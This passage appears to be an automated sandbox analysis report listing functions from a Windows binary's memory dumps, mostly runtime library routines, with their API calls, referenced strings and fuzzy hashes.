std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0019C302
__Getctype.LIBCPMT ref: 0019C34B
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0019C391
std::_Lockit::~_Lockit.LIBCPMT ref: 0019C445

Strings

bad locale name, xrefs: 0019C460

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Locinfo::_Lockit$AllocGetctypeLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 3635123611-1405518554
Opcode ID: 27930f341c9d0f80d988c7981d41139e45a5aaaad9f4f3c85b753600ccda2786
Instruction ID: 8b51f25b8ba5e89440f3eef23495b346e50b17d7455b9f7d9163a5791c7cd051
Opcode Fuzzy Hash: 27930f341c9d0f80d988c7981d41139e45a5aaaad9f4f3c85b753600ccda2786
Instruction Fuzzy Hash: 57614DB0D05288EAEF10DFE8C6457DEBBF4AF15704F148159E454AB381D7B59A08CB91

Function 001B743E Relevance: 12.2, APIs: 8, Instructions: 224COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 001B74C9
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 001B7557
__alloca_probe_16.LIBCMT ref: 001B7581
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 001B75C9
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 001B75E3
__alloca_probe_16.LIBCMT ref: 001B7609
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 001B7646
CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 001B7663

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: ByteCharMultiWide$__alloca_probe_16$CompareInfoString
String ID:
API String ID: 3603178046-0
Opcode ID: 9f0d7f74ad567950d12da1cd4424ebdb85385a1fb9f3aa62c85f89c51b7c96cf
Instruction ID: 0e85a78d77ffad990f5ab5837f63aa5534d926896e82ca01a68868b9fe5517ac
Opcode Fuzzy Hash: 9f0d7f74ad567950d12da1cd4424ebdb85385a1fb9f3aa62c85f89c51b7c96cf
Instruction Fuzzy Hash: B971A37190864AAFEF219FA8CC55AEE7FBAEFC9354F150019E805A61D0EB35CD40CB60

Function 001B6F23 Relevance: 12.2, APIs: 8, Instructions: 175COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,CCCCCCCC,0019C6DF,?,00000001,00000000,?,00000000,?,0019C6DF,?), ref: 001B6F6C
__alloca_probe_16.LIBCMT ref: 001B6F98
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,0019C6DF,?,?,00000000,0019CCD3,0000003F,?), ref: 001B6FD7
LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0019C6DF,?,?,00000000,0019CCD3,0000003F), ref: 001B6FF4
LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,0019C6DF,?,?,00000000,0019CCD3,0000003F), ref: 001B7033
__alloca_probe_16.LIBCMT ref: 001B7050
LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0019C6DF,?,?,00000000,0019CCD3,0000003F), ref: 001B7092
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,0019C6DF,?,?,00000000,0019CCD3,0000003F,?), ref: 001B70B5

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: fa0164ef1b22aa5c69117bbbf8766a8852f42cc267da3266e5658e823f70bfba
Instruction ID: 5f8734dacc8f284648abb1326319026405d1551dd4aaccb1bdd4e4d83c82cbfe
Opcode Fuzzy Hash: fa0164ef1b22aa5c69117bbbf8766a8852f42cc267da3266e5658e823f70bfba
Instruction Fuzzy Hash: CD51BC7250420AABEB20AFA0DC45FEF7BA9EB95790F11402AFD15A6190DB35DD50CBA0

Function 00195940 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 389fileCOMMON

Download Yara Rule

APIs

GetTempFileNameW.KERNEL32(?,URL,00000000,?,08E011E3,?,00000004), ref: 001959AA
LocalFree.KERNEL32(?), ref: 00195ABB
MoveFileW.KERNEL32(?,00000000), ref: 00195D5B
DeleteFileW.KERNEL32(?), ref: 00195DA3

Strings

url, xrefs: 00195ADC, 00195D86
URL, xrefs: 001959A4, 00195D8B

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: File$DeleteFreeLocalMoveNameTemp
String ID: URL$url
API String ID: 1622375482-346267919
Opcode ID: 07767d37599cfd3cad38d5a488671a021ca34856be627f41637fe57cb2f9aad2
Instruction ID: af32343dd9f6d9a7fb25bb3a4a7a9ec85e2e08fe61b6f468afb90b014489913c
Opcode Fuzzy Hash: 07767d37599cfd3cad38d5a488671a021ca34856be627f41637fe57cb2f9aad2
Instruction Fuzzy Hash: AF025670A146698ACF25DF28CD98BADB7B5BF54304F1042D9E409A7291EB75ABC4CF80

Function 0019F5E0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 189memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,0000000C,08E011E3,?,00000000,00000000,?,?,?,?,00000000,001DB2D1,000000FF,?,0019EBCA,00000000), ref: 0019F624
std::_Lockit::_Lockit.LIBCPMT ref: 0019F65A
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0019F6BE
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0019F77E
std::_Lockit::~_Lockit.LIBCPMT ref: 0019F832

Strings

bad locale name, xrefs: 0019F84E

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Locinfo::_Lockit$AllocLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 2968629171-1405518554
Opcode ID: 44ebd6fca0196d5bb12e8002fccb9cef4366f8ced55751fba6ecda60a282ea25
Instruction ID: e809c8fee5b8bce65e13f5a215e7764cf6caaa5740ec7c386abfd8ec8485ca65
Opcode Fuzzy Hash: 44ebd6fca0196d5bb12e8002fccb9cef4366f8ced55751fba6ecda60a282ea25
Instruction Fuzzy Hash: A7715DB0D05389EAEF11CFE8C9847CEBFB4AF15314F1441A9E414BB281D7B59A09DBA1

Function 0019F3B0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000008,08E011E3,?,00000000,00000000,?,?,?,00000000,001DB1DD,000000FF,?,0019ED0A,00000000,?), ref: 0019F3F4
std::_Lockit::_Lockit.LIBCPMT ref: 0019F42A
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0019F48E
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0019F4FE
std::_Lockit::~_Lockit.LIBCPMT ref: 0019F5B2

Strings

bad locale name, xrefs: 0019F5CE

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Locinfo::_Lockit$AllocLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 2968629171-1405518554
Opcode ID: 01e63907f8bd7547ace804847e8e81e8c11028e41bba7fb25539e47200eeef19
Instruction ID: d1bf1849a0bddb65f60951524c6c82a2bb9f2e69ef05e72fa6afe1fb725f652b
Opcode Fuzzy Hash: 01e63907f8bd7547ace804847e8e81e8c11028e41bba7fb25539e47200eeef19
Instruction Fuzzy Hash: 42618DB0D01388EBEF10CFA8C9447CEBBB4AF15304F1441ADE454AB381D7B59A09CBA1

Function 001B8D30 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 001B8D67
___except_validate_context_record.LIBVCRUNTIME ref: 001B8D6F
_ValidateLocalCookies.LIBCMT ref: 001B8DF8
__IsNonwritableInCurrentImage.LIBCMT ref: 001B8E23
_ValidateLocalCookies.LIBCMT ref: 001B8E78

Strings

csm, xrefs: 001B8E0D

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: b10902300543d2f156edcfe1e0f5c2a8642f60508ad0d338cee3cadee420946b
Instruction ID: a98a3da86e09c31471ab22a9337545de7f506796e96a8354a74d2320ac3c80a3
Opcode Fuzzy Hash: b10902300543d2f156edcfe1e0f5c2a8642f60508ad0d338cee3cadee420946b
Instruction Fuzzy Hash: 9941C634A00209DFCF10EF68C885ADEBBBAFF54724F148456E9149B392DB71EA05CB90

Function 001CC96B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,001CCA78,?,?,?,00000000,?,?,001CCCA2,00000021,FlsSetValue,001E1E00,001E1E08,?), ref: 001CCA2C

Strings

api-ms-, xrefs: 001CC9C2
ext-ms-, xrefs: 001CC9D6

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: eb4df51b169fd85811b77de37228562c407f11f20a235cca39ee596304faa62d
Instruction ID: 6e53e3f3390c8da3681bd9d9a9d69cddaef2df80d21bd8467943f89971fe44ed
Opcode Fuzzy Hash: eb4df51b169fd85811b77de37228562c407f11f20a235cca39ee596304faa62d
Instruction Fuzzy Hash: 1721EB72A01216EBC721D7A5AC49F6E3759DF657A4F250119E90EA7290FB30ED40C6D0

Function 001AD8F6 Relevance: 9.4, APIs: 6, Instructions: 433COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001AD8FD
ctype.LIBCPMT ref: 001AD944

Part of subcall function 001AD458: __Getctype.LIBCPMT ref: 001AD467

Part of subcall function 001A79C9: __EH_prolog3.LIBCMT ref: 001A79D0
Part of subcall function 001A79C9: std::_Lockit::_Lockit.LIBCPMT ref: 001A79DA
Part of subcall function 001A79C9: std::_Lockit::~_Lockit.LIBCPMT ref: 001A7A4B

Part of subcall function 001A7AF3: __EH_prolog3.LIBCMT ref: 001A7AFA
Part of subcall function 001A7AF3: std::_Lockit::_Lockit.LIBCPMT ref: 001A7B04
Part of subcall function 001A7AF3: std::_Lockit::~_Lockit.LIBCPMT ref: 001A7B75

Part of subcall function 001A7CB2: __EH_prolog3.LIBCMT ref: 001A7CB9
Part of subcall function 001A7CB2: std::_Lockit::_Lockit.LIBCPMT ref: 001A7CC3
Part of subcall function 001A7CB2: std::_Lockit::~_Lockit.LIBCPMT ref: 001A7D34

Part of subcall function 001A7C1D: __EH_prolog3.LIBCMT ref: 001A7C24
Part of subcall function 001A7C1D: std::_Lockit::_Lockit.LIBCPMT ref: 001A7C2E
Part of subcall function 001A7C1D: std::_Lockit::~_Lockit.LIBCPMT ref: 001A7C9F

Part of subcall function 001A4403: __EH_prolog3.LIBCMT ref: 001A440A
Part of subcall function 001A4403: std::_Lockit::_Lockit.LIBCPMT ref: 001A4414
Part of subcall function 001A4403: std::_Lockit::~_Lockit.LIBCPMT ref: 001A44BB

collate.LIBCPMT ref: 001ADA78
numpunct.LIBCPMT ref: 001ADCF2

Part of subcall function 001A838F: __EH_prolog3.LIBCMT ref: 001A8396

Part of subcall function 001A80C5: __EH_prolog3.LIBCMT ref: 001A80CC
Part of subcall function 001A80C5: std::_Lockit::_Lockit.LIBCPMT ref: 001A80D6
Part of subcall function 001A80C5: std::_Lockit::~_Lockit.LIBCPMT ref: 001A8147

Part of subcall function 001A81EF: __EH_prolog3.LIBCMT ref: 001A81F6
Part of subcall function 001A81EF: std::_Lockit::_Lockit.LIBCPMT ref: 001A8200
Part of subcall function 001A81EF: std::_Lockit::~_Lockit.LIBCPMT ref: 001A8271

Part of subcall function 001A4403: Concurrency::cancel_current_task.LIBCPMT ref: 001A44C6

Part of subcall function 001A75B6: __EH_prolog3.LIBCMT ref: 001A75BD
Part of subcall function 001A75B6: std::_Lockit::_Lockit.LIBCPMT ref: 001A75C7
Part of subcall function 001A75B6: std::_Lockit::~_Lockit.LIBCPMT ref: 001A7638

__Getcoll.LIBCPMT ref: 001ADAB8

Part of subcall function 0019BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0019BD10
Part of subcall function 0019BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019BD38

Part of subcall function 001984C0: LocalAlloc.KERNEL32(00000040,00000000,001B839D,00000000,08E011E3,?,00000000,?,00000000,?,001DCB8D,000000FF,?,001917D5,00000000,001DD3BA), ref: 001984C6

codecvt.LIBCPMT ref: 001ADDA3

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: Lockitstd::_$H_prolog3$Lockit::_Lockit::~_$AllocConcurrency::cancel_current_taskGetcollGetctypeLocalcodecvtcollatectypenumpunct
String ID:
API String ID: 613171289-0
Opcode ID: 68eceddac68490560835bf72d13585d6f8e36c7af311a53803473e76ef1d2e69
Instruction ID: f62bb84f4b0752ba15e62c2659b56f5bab7a04ae1acab20cfef880ea3cda706c
Opcode Fuzzy Hash: 68eceddac68490560835bf72d13585d6f8e36c7af311a53803473e76ef1d2e69
Instruction Fuzzy Hash: E9E105B9C006069FDF15AFA4AC026BF7AA4FF97360F15442DF95AAB281DF708D009791

Function 00192BD0 Relevance: 9.2, APIs: 6, Instructions: 225encryptionCOMMON

Download Yara Rule

APIs

#224.MSI(?,00000001,00000000,00000000,00000000), ref: 00192C43
LocalFree.KERNEL32(?), ref: 00192CA2
LocalFree.KERNEL32(?), ref: 00192D0C
CertFreeCertificateContext.CRYPT32(00000000), ref: 00192E94

Part of subcall function 00193D60: CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 00193DA3

LocalFree.KERNEL32(?), ref: 00192E13
LocalFree.KERNEL32(?), ref: 00192E6B

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: Free$Local$Cert$#224CertificateContextNameString
String ID:
API String ID: 2665452496-0
Opcode ID: ac46a1cf46b3b4b7ec91b2c031e370902eaedf0005db1c819d6a567629b55e4c
Instruction ID: 76b16105742f7b6e923ff451ea2a9fe0032d2c66b58aaf9a00a27f33b2542635
Opcode Fuzzy Hash: ac46a1cf46b3b4b7ec91b2c031e370902eaedf0005db1c819d6a567629b55e4c
Instruction Fuzzy Hash: A0918E70D11249DFDB18CFA8C59879EBBB1FF84304F24461DE415AB391DBB5AA84CB90

Function 0019B500 Relevance: 9.2, APIs: 6, Instructions: 152COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0019B52D
std::_Lockit::_Lockit.LIBCPMT ref: 0019B550
std::_Lockit::~_Lockit.LIBCPMT ref: 0019B578
std::_Facet_Register.LIBCPMT ref: 0019B5ED
std::_Lockit::~_Lockit.LIBCPMT ref: 0019B617
LocalFree.KERNEL32 ref: 0019B6C0

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_FreeLocalRegister
String ID:
API String ID: 1378673503-0
Opcode ID: 00bca36c9bb5027e63d3009c1138c491f52b388458b2e58d39541c218673b37a
Instruction ID: e3a59fbc35a21fc742d7dbaea7f726b7f928ddd5fc014d259fda08e6146df1f2
Opcode Fuzzy Hash: 00bca36c9bb5027e63d3009c1138c491f52b388458b2e58d39541c218673b37a
Instruction Fuzzy Hash: 4751DE71904649EFDB20DF98E980BAEBBF4FF05320F14465AE811A7390D770AE40CB91

Function 001C5981 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 369COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 001C5A6B
__freea.LIBCMT ref: 001C5B01
__freea.LIBCMT ref: 001C5B1D

Strings

am/pm, xrefs: 001C5B81
a/p, xrefs: 001C5BE5

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: __freea$__alloca_probe_16
String ID: a/p$am/pm
API String ID: 3509577899-3206640213
Opcode ID: 38e0f3bbdd0a116d91585fd3bfa1f8e9df62e5cc8cd8dc3ee5cd4e56a273217a
Instruction ID: b899f13f1f9a042e1e491eeae9eca4079261f78b1213ec3941385b67034f686c
Opcode Fuzzy Hash: 38e0f3bbdd0a116d91585fd3bfa1f8e9df62e5cc8cd8dc3ee5cd4e56a273217a
Instruction Fuzzy Hash: 89C1BF71900B469ACB288FA8C889FBA7BB2FF26704F24414DE506AB255D331EDC1CB55

Function 001BAEF5 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,001BAEEC,001B9710,001B85A3), ref: 001BAF03
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001BAF11
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001BAF2A
SetLastError.KERNEL32(00000000,001BAEEC,001B9710,001B85A3), ref: 001BAF7C

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 371e26e2a82b8b2443bc4dbc454f2193bd38cb0730461ab4082fe90f523c3057
Instruction ID: 53f9da108caba830e580075afe640fb797ee4ec737ddfed25781106ef1cb36aa
Opcode Fuzzy Hash: 371e26e2a82b8b2443bc4dbc454f2193bd38cb0730461ab4082fe90f523c3057
Instruction Fuzzy Hash: E1012B7220E311AEA7246779FCC5AFE6B94DF11BB0720032FF120A20F1EF518D40A285

Function 001AD38D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001AD394
_Getvals.LIBCPMT ref: 001AD3E6
_Mpunct.LIBCPMT ref: 001AD421
_Mpunct.LIBCPMT ref: 001AD43B

Strings

$+xv, xrefs: 001AD446

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: Mpunct$GetvalsH_prolog3
String ID: $+xv
API String ID: 2204710431-1686923651
Opcode ID: 315c001c415c61391db83362ad35b0825e33c5b1fe28914da2581dbf08b322d1
Instruction ID: 9065a975836ce2303e897d2693128e74d64d14fe835b7b470b1ca90a7a0be377
Opcode Fuzzy Hash: 315c001c415c61391db83362ad35b0825e33c5b1fe28914da2581dbf08b322d1
Instruction Fuzzy Hash: C221B0B5804B926EDB25DF75949077BBEF8AB1E700B04095AE09AC7E02D734EA01CB90

Function 001983E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62libraryloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(08E011E3,08E011E3,?,?,00000000,001DA221,000000FF), ref: 0019847B

Part of subcall function 001B7875: EnterCriticalSection.KERNEL32(001F4AF8,00000000,?,?,001925B6,001F571C,08E011E3,?,00000000,001D93ED,000000FF,?,00191A26), ref: 001B7880
Part of subcall function 001B7875: LeaveCriticalSection.KERNEL32(001F4AF8,?,?,001925B6,001F571C,08E011E3,?,00000000,001D93ED,000000FF,?,00191A26,?,?,?,08E011E3), ref: 001B78BD

GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00198440
GetProcAddress.KERNEL32(00000000), ref: 00198447

Part of subcall function 001B782B: EnterCriticalSection.KERNEL32(001F4AF8,?,?,00192627,001F571C,001DCCC0), ref: 001B7835
Part of subcall function 001B782B: LeaveCriticalSection.KERNEL32(001F4AF8,?,?,00192627,001F571C,001DCCC0), ref: 001B7868
Part of subcall function 001B782B: RtlWakeAllConditionVariable.NTDLL ref: 001B78DF

Strings

IsWow64Process, xrefs: 00198436
kernel32, xrefs: 0019843B

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AddressConditionCurrentHandleModuleProcProcessVariableWake
String ID: IsWow64Process$kernel32
API String ID: 2056477612-3789238822
Opcode ID: 30dfbef8572f2ad929e06c63f494965f8d4ba7dda191f60e9d6d5cd3966a128a
Instruction ID: 65605fae1d8da65b873e5fbfe06243a1c5bfb95f08821843925ca1236d2bd260
Opcode Fuzzy Hash: 30dfbef8572f2ad929e06c63f494965f8d4ba7dda191f60e9d6d5cd3966a128a
Instruction Fuzzy Hash: C4117272945B45EFCB10DFA4FC45BA977A8FB09B20F10476AE921936D0DB756900CA50

Function 001C8461 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,08E011E3,?,?,00000000,001DCBE4,000000FF,?,001C83F1,?,?,001C83C5,?), ref: 001C8496
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001C84A8
